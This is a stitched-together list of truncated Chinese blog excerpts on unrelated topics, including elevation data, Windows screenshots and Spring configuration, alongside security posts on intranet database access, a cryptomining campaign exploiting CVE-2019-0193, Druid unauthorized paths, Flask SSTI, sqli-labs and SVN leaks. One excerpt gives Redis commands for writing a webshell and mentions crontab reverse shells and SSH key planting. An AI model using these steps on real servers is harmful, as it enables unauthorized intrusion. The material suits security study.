当攻击者能够进入内网,同时发现某台服务器装有弱口令的数据库时,除了在console中查看数据库信息外, 还可以利用第三方工具进行数据库读取,本例中使用DBeaver进行查看. 1. 下载DBeaver 链接:http://pan.baidu.com/s/1geLN7Dh 密码:1dqj 2. 解压后进入目录,点击dbeaver.exe启动 3. 建立数据库连接 4. 以下标记红框的地方都是需要填写的地方 注意事项: oracle默认端口是1521,sid的值可以在linux环境下使用数据库用户登…

之前写过一篇短文对比过几种数字高程数据的区别:5种全球高程数据对比,这篇文章简要介绍下如何下载这些数据.       1.DLR的数字高程数据.该数据也是SRTM(shuttle radar topography mission,航天飞机雷达地形测绘任务)数据,一般提到SRTM都是指NASA在2000年利用奋进号跑出来的数字高程数据,覆盖全面.公开数据早.精度在今天仍相当可观,所以更加有名.但SRTM并不只专指这一家,当年德国航天局DLR同在奋进号上用自己的雷达搞地形测绘,美国人用的C波段雷达,…

概述 近日,阿里云安全团队监测到挖矿团伙利用solr dataimport RCE(CVE-2019-0193)作为新的攻击方式对云上主机进行攻击,攻击成功后下载门罗币挖矿程序进行牟利.该团伙使用的恶意脚本与之前报道的“威胁预警 | watchbog挖矿蠕虫升级,利用Bluekeep RDP等多个漏洞蓄势待发”文章所提团伙使用的基本一致,因此基本认为是同一团伙所为. 除此之外,可以合理推测,该团伙一直活跃在寻找新的攻击方式来植入其恶意程序,阿里云安全团队已在第一时间对该利用方式进行了监控,并对该…

Druid简介 1.Druid是阿里巴巴数据库事业部出品,为监控而生的数据库连接池. 2.Druid提供的监控功能,监控SQL的执行时间.监控Web URI的请求.Session监控. Druid可能存在的一些问题 首先Druid是不存在什么漏洞的. 当开发者配置不当时就可能造成未授权访问下面给出常见Druid未授权访问路径 /druid/websession.html /system/druid/websession.html /webpage/system/druid/websession.…

Flask SSTI利用方式的探索 一.SSTI简介&环境搭建 ​ 一个统一风格的站点,其大多数页面样式都是一致的,只是每个页面显示的内容各不相同.要是所有的逻辑都放在前端进行,无疑会影响响应效果和效率,很不现实.把所有的逻辑放在后端,又会导致太过复杂,前轻后重. ​ 模板的诞生是为了将显示与数据分离,让前端工作人员专注表现设计,后台人员注重业务逻辑,同时简化代码的复杂程度.模板技术多种多样,但其本质是将模板文件和数据通过模板引擎生成最终的HTML代码. ​ Flask使用Jinja 2作为模板…

在Windows 10中截取截图的6种方式 简介 截图对于不同的目的很重要.它可以用于捕获笔记本电脑上的任何内容的截图.所以,如果你使用Windows 10,你可能不知道如何截图,因为它是比较新的.因此,我们展示了5种方式,您可以屏蔽任何东西,特别是如果您使用Windows 10.这里有6种方式在Windows 10中截取截图.   截图工具 Snipping工具是Windows的内置截图工具.每个Windows操作笔记本电脑都配有此选项.在Windows 10中查找剪贴工具并不困难.只需在搜索…

总结一下redis未授权拿shell: redis-cli -h ip >info 查看系统类型 Windows: 1.找网站绝对路径 2.config set dir 绝对路径根路径 config get dir config set dbfilename indexbak.php set webshell "<?php phpinfo();?>" save Linux系统: 第一种:写密钥 第二种:写crotab反弹shell 第三种:找绝对路径写webshell…

1,java的配置方式简介java的配置方式是为了代替使用xml配置方式,主要使用两个注解:@Configuration//通过该注解来表明该类是一个spring的配置,相当于一个xml文件@ComponentScan(basePackages="com.SpringBoot.javaConfig")//配置扫码包 设置bean的方式,既可以直接在bean类上面使用@Component,@Service也可在java配置类里面使用@bean,搭配类似如下方法代替xml中bean的配置:…

漏洞分析 使用sqli-lab中的lesson-52作为测试目标.关键代码为: error_reporting(0); $id=$_GET['sort']; if(isset($id)) { //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'SORT:'.$id."\n"); fclose($fp); $sql="SELECT…

之前仅知道svn权限配置不当,会导致敏感信息泄漏,但是一直不知道具体利用方式. 今天测试svn dig时抓包分析才知道: http://www.xxx.com/路径/.svn/text-base/文件名.svn-base 哈哈--…